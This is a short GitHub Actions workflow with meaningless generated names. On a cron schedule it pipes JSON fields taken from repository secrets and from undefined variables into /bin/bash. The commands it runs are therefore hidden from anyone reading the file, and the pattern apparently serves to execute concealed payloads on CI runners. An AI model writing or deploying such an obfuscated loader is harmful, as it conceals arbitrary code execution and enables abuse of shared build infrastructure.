name: taogongzhu4536
on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taogongzhu4536
        env:
          nsf27480: ${{ secrets.nsf27480 }}
        run: |
          echo $nsf27480 | jq -r .a6 | /bin/bash
          echo $qvuax5085 | jq -r .huop92342 | /bin/bash
          echo $h4 | jq -r .ivman7 | /bin/bash
          echo $or345 | jq -r .ni17191 | /bin/bash
          echo $m11 | jq -r .dvj3 | /bin/bash

